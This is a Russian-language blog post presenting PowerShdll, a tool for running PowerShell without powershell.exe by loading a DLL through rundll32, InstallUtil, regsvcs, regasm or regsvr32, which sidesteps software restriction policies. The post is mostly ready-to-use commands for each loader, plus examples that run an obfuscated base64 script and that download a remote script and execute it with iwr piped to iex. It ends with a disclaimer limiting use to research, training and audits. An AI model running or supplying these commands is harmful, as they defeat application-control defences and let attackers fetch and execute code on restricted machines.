PowerShdll: запустите PowerShell с помощью rundll32 обход ограничения программного обеспечения

guest февраля 14, 2021

PowerShdll

Запустите PowerShell только с dll.

Не требует доступа к powershell.exe, поскольку он использует dlls powershell automation.

PowerShdll можно запускать с помощью: rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regasm.exe.

dll mode:

Usage:rundll32 PowerShdll,main rundll32 PowerShdll,main -fRun the script passed as argumentrundll32 PowerShdll,main -w Start an interactive console in a new windowrundll32 PowerShdll,main -i Start an interactive console in this consoleIf you do not have an interractive console, use -n to avoid crashes on output

Альтернативы

1.x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dllx64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll2.x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShdll.dllx64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShdll.dll3.x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShdll.dllx64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShdll.dll4.regsvr32 /s /u PowerShdll.dll -->Calls DllUnregisterServerregsvr32 /s PowerShdll.dll --> Calls DllRegisterServer

exe mode

Usage:PowerShdll.exe PowerShdll.exe -h Display this message.PowerShdll.exe -fRun the script passed as argumentPowerShdll.exe -i Start an interactive console in this console (Default)

Скачать

Зависимости

  • .Net v3.5 для dll mode.
  • .Net v2.0 для exe mode.

git clone https://github.com/p3nt4/PowerShdll.git

Примеры

Запустить кодированный base64 скрипт

rundll32 Powershdll.dll,main $a = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("BASE64")); Invoke-Expression $a

Скачайте и запустите скрипт

rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

      
      




















Отправить комментарий







0
Комментарии